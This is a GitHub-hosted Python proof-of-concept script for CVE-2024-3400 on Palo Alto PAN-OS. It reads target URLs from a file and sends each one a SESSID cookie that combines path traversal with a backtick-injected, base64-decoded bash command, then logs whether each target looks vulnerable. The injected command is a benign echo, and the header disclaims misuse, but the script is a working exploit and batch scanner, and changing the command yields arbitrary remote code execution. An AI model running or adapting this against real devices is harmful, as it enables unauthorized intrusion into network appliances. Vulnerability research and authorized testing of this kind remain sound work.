-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcve-2024-3400.py
65 lines (52 loc) · 2.65 KB
/
cve-2024-3400.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
# Basic Test for CVE-2024-3400 RCE on Palo Alto Pan OS Telemetry endpoint. This is designed to run a benign echo request. Please use responsibly. Abuse of this for exploitation without authorization is unethical and illegal. I'm only releasing this as the explout is trivial and other POC adjacent code exists publicly. Please note this code has NOT been tested and should be inspected carefully before use. As Is. No Warranty. Frankly I wouldnt trust me with code in production. I'm a hacker not a developer. Do good not evil. - @Shadow0pz
# Credit to Watchtowr labs, @HackingLZ (Justin Elze) and @cyb3rops (Florian Roth) for their initial posts.
import requests
import base64
import sys
# Function to encode command in Base64
def encode_command(command):
return base64.b64encode(command.encode()).decode()
# Function to test for command injection
def test_command_injection(url, output_file):
# Base64 encoded command to be executed
encoded_command = encode_command("echo test")
# Payload with the encoded command
payload = {
"Cookie": f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/`{encoded_command}|base64 -d|bash`"
}
# Header to mimic a legitimate browser request
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
}
try:
response = requests.get(url, headers=headers, cookies=payload, timeout=10)
result = "Vulnerable" if "test" in response.text else "Not Vulnerable"
except requests.RequestException as e:
result = f"Failed to connect: {e}"
# Write the result to the output file
try:
with open(output_file, 'a') as file:
file.write(f"{url}: {result}\n")
except IOError as e:
print(f"Error writing to file {output_file}: {e}")
# Main function
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: python cve-2024-3400.py <input_file> <output_file>. Also: Don't be a jerk.'")
sys.exit(1)
input_file = sys.argv[1]
output_file = sys.argv[2]
# Try to open the input file and read URLs
try:
with open(input_file, 'r') as file:
urls = [line.strip() for line in file if line.strip()]
except FileNotFoundError:
print(f"The file {input_file} was not found.")
sys.exit(1)
except IOError as e:
print(f"An error occurred reading {input_file}: {e}")
sys.exit(1)
# Test each URL and write results to the output file
for url in urls:
test_command_injection(url, output_file)
print(f"Testing complete. Results are saved in '{output_file}'.")